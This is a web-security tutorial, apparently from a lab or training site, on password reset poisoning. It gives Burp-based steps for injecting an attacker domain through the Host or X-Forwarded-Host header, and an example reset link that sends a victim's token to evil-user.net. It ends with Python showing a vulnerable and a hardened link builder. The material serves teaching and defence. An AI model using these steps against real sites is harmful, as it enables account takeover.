Password Reset Poisoning

Introduction

It is common for password reset functionality to include the Host header value when creating password reset links that carry a generated secret token. If the application accepts an attacker-controlled domain when building that link, a victim who clicks the link in the email delivers the reset token to the attacker, who can then reset the victim's password.

Constructing a Password Reset Poisoning Attack

If the URL that is sent to the user is dynamically generated based on controllable input, such as the Host header, it may be possible to construct a password reset poisoning attack as follows:

  1. The attacker obtains the victim's email address or username, as required, and submits a password reset request on their behalf. When submitting the form, they intercept the resulting HTTP request and modify the Host header so that it points to a domain that they control. For this example, we'll use evil-user.net.

  2. The victim receives a genuine password reset email directly from the website. This seems to contain an ordinary link to reset their password and, crucially, contains a valid password reset token that is associated with their account. However, the domain name in the URL points to the attacker's server:

    https://evil-user.net/reset?token=0a1b2c3d4e5f6g7h8i9j

  3. If the victim clicks this link (or it is fetched in some other way, for example, by an antivirus scanner), the password reset token will be delivered to the attacker's server.

  4. The attacker can now visit the real URL for the vulnerable website and supply the victim's stolen token via the corresponding parameter. They will then be able to reset the user's password to whatever they like and subsequently log in to their account.


Basic Password Reset Poisoning

  • Click the forgot password link, enter the victim's username and submit the form

  • In Burp Proxy, send the captured /forgot-password request to Repeater

  • Change the Host header value to the attacker-controlled domain (for example, a Burp Collaborator URL)

  • Send the request

  • When the victim clicks the link, the reset token appears in the Burp Collaborator window

  • Copy the reset token and submit it to the legitimate website domain with the required parameters

  • You should now be able to set a new password for the victim user

Password Reset Poisoning via Middleware

In this variant the application rejects a modified Host header, so that mitigation is bypassed by supplying the attacker's domain in the X-Forwarded-Host header instead, a header that front-end middleware (reverse proxies, load balancers) and proxy-aware frameworks often trust when building absolute URLs.

  • Click the forgot password link, enter the victim's username and submit the form

  • In Burp Proxy, send the captured /forgot-password request to Repeater

  • Add a new X-Forwarded-Host header whose value is the attacker-controlled domain (for example, a Burp Collaborator URL)

  • Send the request

  • When the victim clicks the link, the reset token appears in the Burp Collaborator window

  • Copy the reset token and submit it to the legitimate website domain with the required parameters

  • You should now be able to set a new password for the victim user
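Both procedures above (the basic one and the middleware one) come down to the same defect: the application builds the absolute reset link from a request header. The following is an added example, not code from the original page or from any product it mentions, showing that vulnerable pattern next to a hardened version that builds the link from a configured origin and flags mismatched hosts so the attempt can be logged; CANONICAL_ORIGIN, ALLOWED_HOSTS and example.com are assumed configuration values.

```python
from urllib.parse import urlencode

# Hypothetical configuration: the origin the site is really served from,
# and the hostnames it legitimately answers to.
CANONICAL_ORIGIN = "https://example.com"
ALLOWED_HOSTS = {"example.com", "www.example.com"}


def _hdr(headers, name):
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def build_reset_url_vulnerable(headers, token):
    """The pattern described on this page: the link's host comes from the request.
    Proxy-aware frameworks usually prefer X-Forwarded-Host over Host, which is
    why the 'via middleware' variant works even when Host itself is validated."""
    host = _hdr(headers, "X-Forwarded-Host") or _hdr(headers, "Host")
    return f"https://{host}/reset?{urlencode({'token': token})}"


def build_reset_url_hardened(headers, token):
    """Fix: the link is built from a fixed, configured origin, so no request
    header can influence it. Returns (url, suspicious); suspicious is True when
    the request's Host is off the allow-list or a forwarding header disagrees
    with it, a signal worth logging as a poisoning attempt."""
    host = (_hdr(headers, "Host") or "").split(":")[0].lower()
    forwarded = _hdr(headers, "X-Forwarded-Host")
    suspicious = host not in ALLOWED_HOSTS or (
        forwarded is not None and forwarded.split(":")[0].lower() not in ALLOWED_HOSTS
    )
    return f"{CANONICAL_ORIGIN}/reset?{urlencode({'token': token})}", suspicious


if __name__ == "__main__":
    # Constructed request headers matching the page's two scenarios.
    token = "0a1b2c3d4e5f6g7h8i9j"  # token value from the page's example link
    basic = {"Host": "evil-user.net"}
    middleware = {"Host": "example.com", "X-Forwarded-Host": "evil-user.net"}
    for hdrs in (basic, middleware):
        print("vulnerable:", build_reset_url_vulnerable(hdrs, token))
        print("hardened:  ", build_reset_url_hardened(hdrs, token))
```

Logging the suspicious flag rather than failing the request avoids giving an attacker an oracle for which hostnames the application accepts.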

